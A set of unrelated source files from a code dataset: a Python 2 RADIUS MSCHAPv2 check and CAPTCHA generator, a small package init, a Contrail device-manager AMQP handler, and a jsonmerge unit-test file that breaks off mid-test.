# arguments are evaluated at `def` time, create_validate_code uses that
# later definition, making this one dead -- confirm and deduplicate.
_letter_cases = "abcdefghjkmnpqrstuvwxy"
_upper_cases = _letter_cases.upper()
_numbers = ''.join(map(str, range(3, 10)))
init_chars = ''.join((_letter_cases, _upper_cases, _numbers))
def radius_challenge(username, password, host, secret, port, nasip, debug):
    """Authenticate against a RADIUS server using MSCHAPv2.

    Builds an Access-Request with the MSCHAPv2 attributes for the given
    credentials, sends it to host:port, and reports the round-trip time.
    Returns True on Access-Accept, False on Access-Reject or send timeout.
    When `debug` is true, dumps the request/reply attributes to stdout.
    (Python 2 only: uses print statements and py2 except syntax.)
    """
    hostname = gethostname()
    # RADIUS attribute dictionary shipped alongside this script.
    dict_path = sys.path[0] + "/lib/dicts/dictionary"
    radius = Client(server = host, secret = secret, authport = port, dict = Dictionary(dict_path))
    request = radius.CreateAuthPacket(code = packet.AccessRequest)
    if debug:
        print "[DEBUG] assembling packet attributes"
    request["User-Name"] = username
    request["NAS-IP-Address"] = nasip
    request["NAS-Identifier"] = hostname
    if debug:
        print "[DEBUG] auth method: mscharpv2"
    # Compute the MSCHAPv2 challenge/response attributes for the password.
    auth = mschap2.MSCHAP2()
    authAttrs = {}
    authAttrs = auth.getAuthAttrs(username, password)
    for key in authAttrs.keys():
        request[key] = authAttrs[key]
    if debug:
        print "[DEBUG] dumping request attributes..."
        for key in request.keys():
            print "[DEBUG]\t\t %s : %s" % (key,request[key])
    tsStart = time()
    try:
        reply = radius.SendPacket(request)
    except packet.PacketError,e:
        # No reply from the server (e.g. timeout/retries exhausted).
        if debug:
            print e
        print "CRITICAL: Timeout sending Access-Request"
        return False
    tsStop = time()
    if debug:
        print "[DEBUG] dumping reply attributes..."
        for key in reply.keys():
            print "[DEBUG]\t\t %s : %s" % (key,reply[key])
    if reply.code == packet.AccessAccept:
        print username," OK: Access-Accept in: %0.2f seconds" % (tsStop - tsStart)
        return True
    else:
        print "CRITICAL: Access-Reject in: %0.2f seconds" % (tsStop - tsStart)
        return False
# NOTE(review): this re-assignment overrides the stricter (ambiguity-free)
# alphabet defined at the top of the module; because default arguments are
# bound at `def` time, create_validate_code's default `chars` uses THIS
# init_chars, which includes confusable glyphs like i/l/o -- confirm intent.
_letter_cases = "abcdefghijklnmopqrstuvwxyz"
_upper_cases = _letter_cases.upper()
_numbers = ''.join(map(str, range(3, 10)))
init_chars = ''.join((_letter_cases, _upper_cases, _numbers))
# TrueType font used to render the CAPTCHA text, shipped next to this file.
FONT_FILE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'framd.ttf')
def create_validate_code(size=(150, 40),
                         chars=init_chars,
                         img_type="jpeg",
                         mode="RGB",
                         bg_color=(255, 255, 255),
                         fg_color=(0, 0, 255),
                         font_size=18,
                         font_type=FONT_FILE_PATH,
                         length=6,
                         draw_lines=True,
                         n_line=(1, 2),
                         draw_points=True,
                         point_chance=2):
    """
    Generate a CAPTCHA image.

    @param size: image size as (width, height); default (150, 40)
    @param chars: string of allowed characters
    @param img_type: image format to save as; one of GIF, JPEG, TIFF, PNG
    @param mode: image mode, default RGB
    @param bg_color: background colour, default white
    @param fg_color: foreground (glyph) colour, default blue #0000FF
    @param font_size: font size of the CAPTCHA characters
    @param font_type: font file used to render the characters
    @param length: number of characters in the CAPTCHA
    @param draw_lines: whether to draw interference lines
    @param n_line: (min, max) range for the number of interference lines;
                   only used when draw_lines is True
    @param draw_points: whether to draw interference points
    @param point_chance: per-pixel probability of an interference point,
                         clamped to [0, 100]
    @return: [0]: PIL Image instance
    @return: [1]: the character string rendered into the image
    """
    width, height = size # width, height
    img = Image.new(mode, size, bg_color) # create the canvas
    draw = ImageDraw.Draw(img) # create the pen
    def get_chars():
        """Return `length` randomly sampled characters as a list."""
        return random.sample(chars, length)
    def create_lines():
        """Draw the interference lines."""
        line_num = random.randint(*n_line) # number of interference lines
        for i in range(line_num):
            # start point
            begin = (random.randint(0, size[0]), random.randint(0, size[1]))
            # end point
            end = (random.randint(0, size[0]), random.randint(0, size[1]))
            draw.line([begin, end], fill=(0, 0, 0))
    def create_points():
        """Draw the interference points."""
        chance = min(100, max(0, int(point_chance))) # clamp to [0, 100]
        for w in range(width):
            for h in range(height):
                tmp = random.randint(0, 100)
                if tmp > 100 - chance:
                    draw.point((w, h), fill=(0, 0, 0))
    def create_strs():
        """Render the CAPTCHA characters; returns the plain string."""
        c_chars = get_chars()
        strs = ' %s ' % ' '.join(c_chars) # space-separate the characters
        font = ImageFont.truetype(font_type, font_size)
        font_width, font_height = font.getsize(strs)
        draw.text(((width - font_width) / 3, (height - font_height) / 3),
                  strs, font=font, fill=fg_color)
        return ''.join(c_chars)
    if draw_lines:
        create_lines()
    if draw_points:
        create_points()
    strs = create_strs()
    # perspective-distortion coefficients (slight random warp)
    params = [1 - float(random.randint(1, 2)) / 100,
              0,
              0,
              0,
              1 - float(random.randint(1, 10)) / 100,
              float(random.randint(1, 2)) / 500,
              0.001,
              float(random.randint(1, 2)) / 500
              ]
    img = img.transform(size, Image.PERSPECTIVE, params) # apply the warp
    img = img.filter(ImageFilter.EDGE_ENHANCE_MORE) # edge-enhance filter (stronger threshold)
    return img, strs
| shanghai-edu/radius-1xtest | app/utils.py | Python | apache-2.0 | 6,206 |
from .physics import *
from tools import *
from geo2xml import generate_mesh
from dirnames import *
from geometries import get_geo, get_pore
from scripts import * #simulation2D, simulate
import plots | mitschabaude/nanopores | nanopores/__init__.py | Python | mit | 201 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2016 Juniper Networks, Inc. All rights reserved.
#
"""
Device Manager amqp handler
"""
from cfgm_common.vnc_amqp import VncAmqpHandle
from db import DBBaseDM, VirtualNetworkDM, PhysicalRouterDM
class DMAmqpHandle(VncAmqpHandle):
    """AMQP (RabbitMQ) message handler for the Device Manager.

    Thin specialization of VncAmqpHandle that supplies the device-manager
    queue prefix and RabbitMQ connection settings, and re-evaluates
    device-manager state for objects touched by a processed change.
    """
    def __init__(self, logger, reaction_map, args):
        # `args` carries the parsed service configuration (rabbit_* and
        # kombu_ssl_* options).
        q_name_prefix = 'device_manager'
        rabbitmq_cfg = {
            'servers': args.rabbit_server, 'port': args.rabbit_port,
            'user': args.rabbit_user, 'password': args.rabbit_password,
            'vhost': args.rabbit_vhost, 'ha_mode': args.rabbit_ha_mode,
            'use_ssl': args.rabbit_use_ssl,
            'ssl_version': args.kombu_ssl_version,
            'ssl_keyfile': args.kombu_ssl_keyfile,
            'ssl_certfile': args.kombu_ssl_certfile,
            'ssl_ca_certs': args.kombu_ssl_ca_certs
        }
        super(DMAmqpHandle, self).__init__(logger._sandesh, logger, DBBaseDM,
                reaction_map, q_name_prefix, rabbitmq_cfg)
    def evaluate_dependency(self):
        # For every resource the dependency tracker marked as affected,
        # refresh its derived state.
        if not self.dependency_tracker:
            return
        for vn_id in self.dependency_tracker.resources.get('virtual_network',
                                                           []):
            vn = VirtualNetworkDM.get(vn_id)
            if vn is not None:
                vn.update_instance_ip_map()
        for pr_id in self.dependency_tracker.resources.get('physical_router',
                                                           []):
            pr = PhysicalRouterDM.get(pr_id)
            if pr is not None:
                # Mark the router for config push and emit its UVE.
                pr.set_config_state()
                pr.uve_send()
| eonpatapon/contrail-controller | src/config/device-manager/device_manager/dm_amqp.py | Python | apache-2.0 | 1,671 |
# vim:ts=4 sw=4 expandtab softtabstop=4
import unittest
import warnings
from collections import OrderedDict
import jsonmerge
import jsonmerge.strategies
from jsonmerge.exceptions import (
HeadInstanceError,
BaseInstanceError,
SchemaError
)
from jsonmerge.jsonvalue import JSONValue
import jsonschema
try:
Draft6Validator = jsonschema.validators.Draft6Validator
except AttributeError:
Draft6Validator = None
warnings.simplefilter("always")
class TestMerge(unittest.TestCase):
def test_default(self):
schema = {}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, "b")
def test_overwrite(self):
schema = {'mergeStrategy': 'overwrite'}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, "b")
def test_version(self):
schema = {'mergeStrategy': 'version'}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, [{'value': "a"}, {'value': "b"}])
def test_version_does_not_duplicate(self):
# Don't record change if it didn't change
schema = {'mergeStrategy': 'version'}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, [{'value': "a"}, {'value': "b"}])
def test_version_meta(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, "a", merge_options={
'version': {'metadata': {'uri': 'http://example.com/a'}}})
base = merger.merge(base, "b", merge_options={
'version': {'metadata': {'uri': 'http://example.com/b'}}})
self.assertEqual(base, [
{'value': "a",
'uri': 'http://example.com/a'},
{'value': "b",
'uri': 'http://example.com/b'}])
def test_version_meta_not_obj(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
with self.assertRaises(SchemaError) as cm:
merger.merge(None, "a", merge_options={'version': {'metadata': 'foo'}})
def test_version_meta_deprecated(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
with warnings.catch_warnings(record=True) as w:
base = merger.merge(None, 'a', meta={'foo': 'bar'})
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, DeprecationWarning))
def test_version_ignoredups_false(self):
schema = {'mergeStrategy': 'version',
'mergeOptions': {'ignoreDups': False}}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, "a")
base = merger.merge(base, "a")
self.assertEqual(base, [{'value': "a"}, {'value': "a"}])
def test_version_unique_false(self):
schema = {'mergeStrategy': 'version',
'mergeOptions': {'unique': False}}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, "a")
base = merger.merge(base, "a")
self.assertEqual(base, [{'value': "a"}, {'value': "a"}])
def test_version_ignoredups_true(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, "a")
base = merger.merge(base, "a")
self.assertEqual(base, [{'value': "a"}])
def test_version_last(self):
schema = {'mergeStrategy': 'version',
'mergeOptions': {'limit': 1}}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, [{'value': "b"}])
def test_version_base_not_a_list(self):
schema = {'mergeStrategy': 'version'}
base = "a"
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, "b", schema)
def test_version_base_not_a_list_of_objects(self):
schema = {'mergeStrategy': 'version'}
base = ["a"]
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, "b", schema)
def test_version_base_no_value_in_object(self):
schema = {'mergeStrategy': 'version'}
base = [{}]
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, "b", schema)
def test_version_base_empty_list(self):
schema = {'mergeStrategy': 'version'}
base = []
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, [{'value': 'b'}])
def test_append(self):
schema = {'mergeStrategy': 'append'}
base = None
base = jsonmerge.merge(base, ["a"], schema)
base = jsonmerge.merge(base, ["b"], schema)
self.assertEqual(base, ["a", "b"])
def test_append_type_error(self):
schema = {'mergeStrategy': 'append'}
base = None
with self.assertRaises(HeadInstanceError) as cm:
jsonmerge.merge(base, "a", schema)
self.assertEqual(cm.exception.value.ref, "#")
def test_append_type_error_base(self):
schema = {'mergeStrategy': 'append'}
base = "ab"
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, ["a"], schema)
self.assertEqual(cm.exception.value.ref, "#")
def test_merge_default(self):
schema = {}
base = None
base = jsonmerge.merge(base, {'a': "a"}, schema)
base = jsonmerge.merge(base, {'b': "b"}, schema)
self.assertEqual(base, {'a': "a", 'b': "b"})
def test_merge_empty_schema(self):
schema = {}
base = None
base = jsonmerge.merge(base, {'a': {'b': 'c'}}, schema)
self.assertEqual(base, {'a': {'b': 'c'}})
def test_merge_trivial(self):
schema = {'mergeStrategy': 'objectMerge'}
base = None
base = jsonmerge.merge(base, {'a': "a"}, schema)
base = jsonmerge.merge(base, {'b': "b"}, schema)
self.assertTrue(isinstance(base, dict))
self.assertEqual(base, {'a': "a", 'b': "b"})
def test_merge_null(self):
schema = {'mergeStrategy': 'objectMerge'}
base = {'a': 'a'}
head = {'a': None}
r = jsonmerge.merge(base, head, schema)
self.assertEqual(head, r)
def test_merge_type_error(self):
schema = {'mergeStrategy': 'objectMerge'}
base = None
with self.assertRaises(HeadInstanceError) as cm:
jsonmerge.merge(base, "a", schema)
self.assertEqual(cm.exception.value.ref, "#")
def test_merge_type_error_base(self):
schema = {'mergeStrategy': 'objectMerge'}
base = "ab"
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, {'foo': 1}, schema)
self.assertEqual(cm.exception.value.ref, "#")
def test_merge_overwrite(self):
schema = {'mergeStrategy': 'objectMerge'}
base = None
base = jsonmerge.merge(base, {'a': "a"}, schema)
base = jsonmerge.merge(base, {'a': "b"}, schema)
self.assertEqual(base, {'a': "b"})
def test_merge_objclass(self):
schema = {'mergeStrategy': 'objectMerge', 'mergeOptions': { 'objClass': 'OrderedDict'}}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, OrderedDict([('c', "a"), ('a', "a")]))
self.assertIsInstance(base, OrderedDict)
self.assertEqual([k for k in base], ['c', 'a'])
base = merger.merge(base, {'a': "b"})
self.assertIsInstance(base, OrderedDict)
self.assertEqual([k for k in base], ['c', 'a'])
self.assertEqual(base, {'a': "b", 'c': "a"})
def test_merge_objclass2(self):
schema = {'mergeStrategy': 'objectMerge',
'properties': {
'a': {'mergeStrategy': 'objectMerge',
'mergeOptions': { 'objClass': 'OrderedDict'}}}}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, {'a': {'b': 'c'}, 'd': {'e': 'f'}})
self.assertIsInstance(base, dict)
self.assertIsInstance(base['a'], OrderedDict)
self.assertIsInstance(base['d'], dict)
def test_merge_objclass_bad_cls(self):
schema = {'mergeStrategy': 'objectMerge', 'mergeOptions': { 'objClass': 'foo'}}
merger = jsonmerge.Merger(schema)
base = None
with self.assertRaises(SchemaError) as cm:
merger.merge(base, OrderedDict([('c', "a"), ('a', "a")]))
self.assertEqual(cm.exception.value.ref, '#')
def test_merge_objclass_menu(self):
schema = {'mergeStrategy': 'objectMerge', 'mergeOptions': { 'objClass': 'foo'}}
class MyDict(dict):
pass
objclass_menu = {'foo': MyDict}
merger = jsonmerge.Merger(schema, objclass_menu=objclass_menu)
base = None
base = merger.merge(base, {'c': "a", 'a': "a"})
self.assertTrue(isinstance(base, MyDict))
def test_merge_objclass_def(self):
schema = {'mergeStrategy': 'objectMerge'}
merger = jsonmerge.Merger(schema, objclass_def='OrderedDict')
base = None
base = merger.merge(base, OrderedDict([('c', "a"), ('a', "a")]))
self.assertIsInstance(base, OrderedDict)
self.assertEqual([k for k in base], ['c', 'a'])
base = merger.merge(base, {'a': "b"})
self.assertIsInstance(base, OrderedDict)
self.assertEqual([k for k in base], ['c', 'a'])
self.assertEqual(base, {'a': "b", 'c': "a"})
def test_merge_append(self):
schema = {'mergeStrategy': 'objectMerge',
'properties': {
'a': {'mergeStrategy': 'append'}
}}
base = None
base = jsonmerge.merge(base, {'a': ["a"]}, schema)
base = jsonmerge.merge(base, {'a': ["b"], 'b': 'c'}, schema)
self.assertEqual(base, {'a': ["a", "b"], 'b': 'c'})
def test_merge_append_pattern(self):
schema = {'mergeStrategy': 'objectMerge',
'patternProperties': {
'a': {'mergeStrategy': 'append'}
}}
base = None
base = jsonmerge.merge(base, {'a': ["a"]}, schema)
base = jsonmerge.merge(base, {'a': ["b"], 'b': 'c'}, schema)
self.assertEqual(base, {'a': ["a", "b"], 'b': 'c'})
def test_merge_append_additional(self):
schema = {'mergeStrategy': 'objectMerge',
'properties': {
'b': {'mergeStrategy': 'overwrite'}
},
'additionalProperties': {
'mergeStrategy': 'append'
}}
base = None
base = jsonmerge.merge(base, {'a': ["a"]}, schema)
base = jsonmerge.merge(base, {'a': ["b"], 'b': 'c'}, schema)
self.assertEqual(base, {'a': ["a", "b"], 'b': 'c'})
def test_merge_additional_bool(self):
schema = {'additionalProperties': True}
base = {}
head = {'a': 'a'}
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, {'a': 'a'})
def test_example(self):
head1 = {
'buyer': {
'id': {
'name': "Test old",
},
'uri': 'Test uri old',
}
}
head2 = {
'buyer': {
'id': {
'name': "Test new"
},
'uri': 'Test uri new',
},
'award': "Award"
}
base_expect = {
'buyer': {
'id': {
'name': [
{'value': "Test old"},
{'value': "Test new"},
]
},
'uri': 'Test uri new',
},
'award': "Award"
}
schema = {
'mergeStrategy': 'objectMerge',
'properties': {
'buyer': {
'properties': {
'id': {
'properties': {
'name': {
'mergeStrategy': 'version',
}
}
},
'uri': {
'mergeStrategy': 'overwrite',
}
},
},
'award': {
'mergeStrategy': 'overwrite',
}
},
}
base = None
base = jsonmerge.merge(base, head1, schema)
base = jsonmerge.merge(base, head2, schema)
self.assertEqual(base, base_expect)
def test_internal_refs(self):
schema = {
'id': 'http://example.com/schema_1.json',
'properties': {
'a': {'$ref': "#/definitions/a"},
},
'definitions': {
"a": {
"properties": {
"b": {'mergeStrategy': 'version'},
}
},
}
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, {"a": {"b": "c"}})
base = merger.merge(base, {"a": {"b": "d"}})
self.assertEqual(base, {"a": {"b": [{"value": "c"}, {"value": "d"}]}})
def test_external_refs(self):
schema_1 = {
'id': 'http://example.com/schema_1.json',
'properties': {
'a': {'$ref': "schema_2.json#/definitions/a"},
},
}
schema_2 = {
'id': 'http://example.com/schema_2.json',
'definitions': {
"a": {
"properties": {
"b": {'mergeStrategy': 'version'},
}
},
}
}
merger = jsonmerge.Merger(schema_1)
# merge() would otherwise make a HTTP request
merger.cache_schema(schema_2)
base = None
base = merger.merge(base, {"a": {"b": "c"}})
base = merger.merge(base, {"a": {"b": "d"}})
self.assertEqual(base, {"a": {"b": [{"value": "c"}, {"value": "d"}]}})
@unittest.skipIf(Draft6Validator is None, 'jsonschema too old')
def test_external_refs_draft6(self):
schema_1 = {
'$id': 'http://example.com/schema_1.json',
'properties': {
'a': {'$ref': "schema_2.json#/definitions/a"},
},
}
schema_2 = {
'$id': 'http://example.com/schema_2.json',
'definitions': {
"a": {
"properties": {
"b": {'mergeStrategy': 'version'},
}
},
}
}
merger = jsonmerge.Merger(schema_1, validatorclass=Draft6Validator)
# merge() would otherwise make a HTTP request
merger.cache_schema(schema_2)
base = None
base = merger.merge(base, {"a": {"b": "c"}})
base = merger.merge(base, {"a": {"b": "d"}})
self.assertEqual(base, {"a": {"b": [{"value": "c"}, {"value": "d"}]}})
def test_oneof(self):
schema = {
'oneOf': [
{
'type': 'array',
'mergeStrategy': 'append'
},
{
'type': 'object'
}
]
}
merger = jsonmerge.Merger(schema)
base = [1]
base = merger.merge(base, [2])
self.assertEqual(base, [1,2])
base = {'a': 1}
base = merger.merge(base, {'b': 2})
self.assertEqual(base, {'a': 1, 'b': 2})
base = [1]
with self.assertRaises(HeadInstanceError) as cm:
merger.merge(base, {'b': 2})
self.assertEqual(cm.exception.value.ref, '#')
def test_oneof_recursive(self):
# Schema to merge all arrays with "append" strategy and all objects
# with the default "objectMerge" strategy.
schema = {
"oneOf": [
{
"type": "array",
"mergeStrategy": "append"
},
{
"type": "object",
"additionalProperties": {
"$ref": "#"
}
},
{
"type": "string"
},
]
}
base = {"a": ["1"], "b": "3", "c": {"d": ["4"], "e": "f"}}
head = {"a": ["2"], "b": "4", "g": "7", "c": {"d": ["3"]}}
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, {"a": ["1", "2"], "b": "4", "g": "7", "c": {"d": ["4", "3"], "e": "f"}})
def test_oneof_overwrite_toplevel(self):
schema = {
'mergeStrategy': 'overwrite',
'oneOf': [
{
'type': 'array'
},
{
'type': 'string'
},
]
}
merger = jsonmerge.Merger(schema)
self.assertEqual(merger.merge([2, 3, 4], 'a'), 'a')
self.assertEqual(merger.merge('a', [2, 3, 4]), [2, 3, 4])
def test_oneof_multiple_validate(self):
schema = {
'oneOf': [
{
'type': 'array',
'maxItems': 3,
'mergeStrategy': 'append'
},
{
'type': 'array',
'minItems': 2,
'mergeStrategy': 'overwrite'
}
]
}
merger = jsonmerge.Merger(schema)
base = [1]
base = merger.merge(base, [2])
self.assertEqual(base, [1, 2])
base = [1, 2]
with self.assertRaises(HeadInstanceError) as cm:
base = merger.merge(base, [3, 4])
def test_anyof(self):
schema = {
'anyOf': [
{
'type': 'array'
},
{
'type': 'string'
},
]
}
merger = jsonmerge.Merger(schema)
with self.assertRaises(SchemaError) as cm:
merger.merge([2, 3, 4], 'a')
self.assertEqual(cm.exception.value.ref, '#')
def test_anyof_overwrite_toplevel(self):
schema = {
'mergeStrategy': 'overwrite',
'anyOf': [
{
'type': 'array'
},
{
'type': 'string'
},
]
}
merger = jsonmerge.Merger(schema)
self.assertEqual(merger.merge([2, 3, 4], 'a'), 'a')
self.assertEqual(merger.merge('a', [2, 3, 4]), [2, 3, 4])
def test_custom_strategy(self):
schema = {'mergeStrategy': 'myStrategy'}
class MyStrategy(jsonmerge.strategies.Strategy):
def merge(self, walk, base, head, schema, meta, **kwargs):
if base is None:
ref = ""
else:
ref = base.ref
return JSONValue("foo", ref)
merger = jsonmerge.Merger(schema=schema,
strategies={'myStrategy': MyStrategy()})
base = None
base = merger.merge(base, {'a': 1})
self.assertEqual(base, "foo")
def test_merge_by_id(self):
schema = {
"properties": {
"awards": {
"type": "array",
"mergeStrategy": "arrayMergeById",
"items": {
"properties": {
"id": {"type": "string"},
"field": {"type": "number"},
}
}
}
}
}
a = {
"awards": [
{"id": "A", "field": 1},
{"id": "B", "field": 2}
]
}
b = {
"awards": [
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
expected = {
"awards": [
{"id": "A", "field": 1},
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_when_key_is_empty_should_do_nothing(self):
schema = {
"properties": {
"awards": {
"type": "array",
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"ignoreId": ""},
"items": {
"properties": {
"id": {"type": "string"},
"field": {"type": "number"},
}
}
}
}
}
a = {
"awards": [
{"id": "A", "field": 1},
{"id": "", "field": ""}
]
}
b = {
"awards": [
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
expected = {
"awards": [
{"id": "A", "field": 1},
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_no_items(self):
schema = {
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"idRef": "id"},
}
a = [
{"id": "A", "field": 1},
]
b = [
{"id": "A", "field": 2},
]
# by default, it should fall back to "replace" strategy for integers.
expected = [
{"id": "A", "field": 2},
]
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_simple_ref(self):
schema = {
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"idRef": "key"}
}
a = [
{"key": "A", "field": 1},
]
b = [
{"key": "A", "field": 2},
]
expected = [
{"key": "A", "field": 2},
]
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_no_key(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
a = [
{"id": "A", "field": 1},
]
b = [
{'field': 2}
]
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
# it should ignore array elements that do not have the id
self.assertEqual(base, a)
def test_merge_by_id_compex_ref(self):
schema = {
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"idRef": "/foo/bar"},
}
a = [
{'foo': {'bar': 1}, 'baz': 1}
]
b = [
{'foo': {'bar': 2}}
]
c = [
{'foo': {'bar': 1}, 'baz': 2}
]
# by default, it should fall back to "replace" strategy for integers.
expected = [
{'foo': {'bar': 1}, 'baz': 2},
{'foo': {'bar': 2}}
]
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
base = merger.merge(base, c)
self.assertEqual(base, expected)
def test_merge_by_id_complex_id(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
a = [
{"id": ["A", {"B": "C"} ], "field": 1},
{"id": ["A", {"B": "D"} ], "field": 2},
{"id": ["A", {"B": "E"} ], "field": 3},
]
b = [
{"id": ["A", {"B": "D"} ], "field": 4},
{"id": ["E", {"B": "C"} ], "field": 5},
]
merger = jsonmerge.Merger(schema)
c = merger.merge(a, b)
expected = [
{"id": ["A", {"B": "C"} ], "field": 1},
{"id": ["A", {"B": "D"} ], "field": 4},
{"id": ["A", {"B": "E"} ], "field": 3},
{"id": ["E", {"B": "C"} ], "field": 5},
]
self.assertEqual(expected, c)
def test_merge_by_id_with_complex_array(self):
schema = {
"properties": {
"awards": {
"type": "array",
"mergeStrategy": "arrayMergeById",
"items": {
"properties": {
"id": {"type": "string"},
"field": {
"type": "array",
"items": {
"properties": {
"xx": {
"type": "string"
}
}
}
}
}
}
}
}
}
a = {
"awards": [
{"id": "A", "field": [{"xx": "testA1"}, {"xx": "testA2"}]},
{"id": "B", "field": [{"xx": "testA3"}, {"xx": "testA4"}]}
]
}
b = {
"awards": [
{"id": "B", "field": [{"xx": "testA3"}, {"xx": "testA6"}]},
{"id": "C", "field": [{"xx": "testA7"}, {"xx": "testA8"}]}
]
}
expected = {
"awards": [
{"id": "A", "field": [{"xx": "testA1"}, {"xx": "testA2"}]},
{"id": "B", "field": [{"xx": "testA3"}, {"xx": "testA6"}]},
{"id": "C", "field": [{"xx": "testA7"}, {"xx": "testA8"}]}
]
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_with_subschema(self):
schema = {
"properties": {
"awards": {
"type": "array",
"mergeStrategy": "arrayMergeById",
"items": {
"type": "object",
"properties": {
"id": {
"type": "string"
},
"field": {
"type": "number",
"mergeStrategy": "version"
}
}
}
}
}
}
a = {
"awards": [
{"id": "A", "field": 1},
{"id": "B", "field": 2}
]
}
b = {
"awards": [
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
expected = {
"awards": [
{"id": "A", "field": [{"value": 1}]},
{"id": "B", "field": [{"value": 2}, {"value": 3}]},
{"id": "C", "field": [{"value": 4}]}
]
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_items_array(self):
schema = {
"mergeStrategy": "arrayMergeById",
"items": [
{},
{},
]
}
head = [
{'id': 'A'},
{'id': 'B'}
]
merger = jsonmerge.Merger(schema)
base = None
with self.assertRaises(SchemaError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#/items')
def test_merge_by_id_only_integers(self):
# arrayMergeById strategy can be used to treat simple arrays of
# integers as Python sets by setting idRef to root (i.e. pointing to
# the array element itself)
#
# https://github.com/avian2/jsonmerge/issues/24
schema = {
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"idRef": "/"},
}
base = [ 1, 2 ]
head = [ 2, 3 ]
expected = [ 1, 2, 3]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_bad_head_type(self):
schema = {
'mergeStrategy': 'arrayMergeById'
}
head = {'foo': 'bar'}
base = []
merger = jsonmerge.Merger(schema)
with self.assertRaises(HeadInstanceError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#')
def test_merge_by_id_bad_base_type(self):
schema = {
'mergeStrategy': 'arrayMergeById'
}
head = []
base = {'foo': 'bar'}
merger = jsonmerge.Merger(schema)
with self.assertRaises(BaseInstanceError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#')
def test_merge_by_id_no_base_id(self):
schema = {
'mergeStrategy': 'arrayMergeById'
}
head = [ {'id': 'a'} ]
base = [ {} ]
merger = jsonmerge.Merger(schema)
r = merger.merge(base, head)
self.assertEqual(r, [ {}, {'id': 'a'} ])
def test_merge_by_id_non_unique_base(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
base = [
{'id': 'a'},
{'id': 'a'}
]
head = [
{'id': 'a',
'foo': 1}
]
merger = jsonmerge.Merger(schema)
with self.assertRaises(BaseInstanceError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#/1')
def test_merge_by_id_non_unique_head(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
base = [
{'id': 'a',
'foo': 1},
]
head = [
{'id': 'a',
'foo': 2},
{'id': 'a',
'foo': 3}
]
merger = jsonmerge.Merger(schema)
with self.assertRaises(HeadInstanceError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#/1')
def test_merge_by_id_order_issue_31_1(self):
# There was an issue with arrayMergeById where head value would be
# merged with the last item in the base list, not the matching item.
# The result was then assigned to the matching item.
#
# If the last item in the base list was just created in the same
# arrayMergeById (i.e. by another item in the head list), then merge
# would fail with "Unresolvable JSON pointer".
#
# https://github.com/avian2/jsonmerge/pull/31
schema = {
